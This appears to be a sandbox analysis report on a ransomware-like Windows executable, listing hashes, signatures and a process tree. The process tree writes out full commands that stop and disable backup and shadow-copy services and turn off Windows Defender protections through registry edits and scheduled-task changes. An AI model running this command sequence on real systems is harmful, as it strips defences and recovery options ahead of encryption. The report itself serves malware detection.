Analysis
max time kernel: 32s
max time network: 143s
platform: windows10_x64
resource: win10-en-20211208
submitted: 13-01-2022 13:26

Static task: static1
Behavioral task: behavioral1
Sample: df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
Resource: win7-en-20211208
Behavioral task: behavioral2
Sample: df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
Resource: win10-en-20211208
General
Target: df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
Size: 3.7MB
MD5: ed582a5d8711beaddf0e78f115caca61
SHA1: bfd3d499cdb1d43d1647f09d481795ee022f944e
SHA256: df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687
SHA512: b43813d220a2f6ec38ec6d301d39e65c5e38517d8d6ea76589833dd58d38bcf40204ce042a6c2b38e248408dbde8560aba33556c5801ea2fa88defe6c76274f3
Malware Config
Signatures
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
pid | process
2804 | MpCmdRun.exe
Modifies security service 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Clears Windows event logs 1 TTPs
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
pid | process
3256 | bcdedit.exe
4024 | bcdedit.exe
Drops file in Program Files directory 64 IoCs
Processes:
process (all rows): df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
description | ioc
File opened for modification | C:\Program Files\7-Zip\Lang\cy.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-pl.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__JgAAACYAAAA0.2wfv1
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MAAAADAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__BAAAAAQAAAA0.2wfv1
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ppd.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription1-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-compat.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__DgAAAA4AAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MgAAADIAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Grace-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NgAAADYAAAA0.2wfv1
File opened for modification | C:\Program Files\7-Zip\History.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.c.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Shades of Blue.htm
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__HAAAABwAAAA0.2wfv1
File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\mip.exe.mui
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__DgAAAA4AAAA0.2wfv1
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__EgAAABIAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\jvm.hprof.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__FgAAABYAAAA0.2wfv1
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MAAAADAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipshrv.xml
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AgAAAAIAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__IAAAACAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__PAAAADwAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__GgAAABoAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\OrangeCircles.jpg
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\mshwLatin.dll.mui
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\sRGB.pf.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1
File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__GgAAABoAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AgAAAAIAAAA0.2wfv1
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid | process
2992 | vssadmin.exe
Modifies registry class 3 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | reg.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | reg.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | reg.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
pid | process
600 | powershell.exe
600 | powershell.exe
600 | powershell.exe
3740 | powershell.exe
3740 | powershell.exe
3740 | powershell.exe
2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process (tokens listed in the order the report records them)
Token: SeSecurityPrivilege, SeBackupPrivilege | 3692 | wevtutil.exe
Token: SeSecurityPrivilege, SeBackupPrivilege | 2268 | wevtutil.exe
Token: SeSecurityPrivilege, SeBackupPrivilege | 1016 | wevtutil.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 3944 | wmic.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 3956 | wmic.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege | 3956 | wmic.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process (the report records every row twice; each is shown once here)
PID 2380 wrote to memory of 2792 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 2792 wrote to memory of 3944 | 2792 | net.exe | net1.exe
PID 2380 wrote to memory of 2668 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 2668 wrote to memory of 3668 | 2668 | net.exe | net1.exe
PID 2380 wrote to memory of 4044 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 4044 wrote to memory of 3096 | 4044 | net.exe | net1.exe
PID 2380 wrote to memory of 940 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 940 wrote to memory of 2932 | 940 | net.exe | net1.exe
PID 2380 wrote to memory of 2232 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 2232 wrote to memory of 4020 | 2232 | net.exe | net1.exe
PID 2380 wrote to memory of 3992 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 3992 wrote to memory of 4072 | 3992 | net.exe | net1.exe
PID 2380 wrote to memory of 748 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 748 wrote to memory of 2804 | 748 | net.exe | net1.exe
PID 2380 wrote to memory of 3408 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 3408 wrote to memory of 1188 | 3408 | net.exe | net1.exe
PID 2380 wrote to memory of 668 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | net.exe
PID 668 wrote to memory of 428 | 668 | net.exe | net1.exe
PID 2380 wrote to memory of 1164 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 3320 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 828 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 1040 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 1268 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 1264 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 1432 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 1788 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 1976 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | sc.exe
PID 2380 wrote to memory of 1992 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | reg.exe
PID 2380 wrote to memory of 2224 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | reg.exe
PID 2380 wrote to memory of 504 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | reg.exe
PID 2380 wrote to memory of 3540 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | reg.exe
PID 2380 wrote to memory of 2208 | 2380 | df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | reg.exe
Processes
image path | command line | PID (indented by process depth; signature hits listed beneath each process)

C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | "C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe" | PID:2380
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
    C:\Windows\SYSTEM32\net.exe | net.exe stop "SamSs" /y | PID:2792
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y | PID:3944
    C:\Windows\SYSTEM32\net.exe | net.exe stop "SDRSVC" /y | PID:2668
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y | PID:3668
    C:\Windows\SYSTEM32\net.exe | net.exe stop "SstpSvc" /y | PID:4044
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y | PID:3096
    C:\Windows\SYSTEM32\net.exe | net.exe stop "UI0Detect" /y | PID:940
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y | PID:2932
    C:\Windows\SYSTEM32\net.exe | net.exe stop "vmicvss" /y | PID:2232
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "vmicvss" /y | PID:4020
    C:\Windows\SYSTEM32\net.exe | net.exe stop "VSS" /y | PID:3992
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y | PID:4072
    C:\Windows\SYSTEM32\net.exe | net.exe stop "wbengine" /y | PID:748
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y | PID:2804
    C:\Windows\SYSTEM32\net.exe | net.exe stop "WebClient" /y | PID:3408
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y | PID:1188
    C:\Windows\SYSTEM32\net.exe | net.exe stop "UnistoreSvc_12ec5" /y | PID:668
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UnistoreSvc_12ec5" /y | PID:428
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "SamSs" start= disabled | PID:1164
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "SDRSVC" start= disabled | PID:3320
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "SstpSvc" start= disabled | PID:828
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "UI0Detect" start= disabled | PID:1040
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "vmicvss" start= disabled | PID:1268
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "VSS" start= disabled | PID:1264
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "wbengine" start= disabled | PID:1432
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "WebClient" start= disabled | PID:1788
    C:\Windows\SYSTEM32\sc.exe | sc.exe config "UnistoreSvc_12ec5" start= disabled | PID:1976
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | PID:1992
    C:\Windows\SYSTEM32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | PID:2224
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | PID:504
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | PID:3540
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | PID:2208
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | PID:1184
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | PID:864
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | PID:3212
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | PID:860
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | PID:616
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | PID:1368
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | PID:2752
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | PID:3704
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f | PID:2220
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | PID:636
    C:\Windows\SYSTEM32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | PID:3700
    C:\Windows\SYSTEM32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | PID:868
    C:\Windows\SYSTEM32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | PID:1516
    C:\Windows\SYSTEM32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | PID:3604
    C:\Windows\SYSTEM32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | PID:68
    C:\Windows\SYSTEM32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | PID:1028
    C:\Windows\SYSTEM32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f | PID:1116
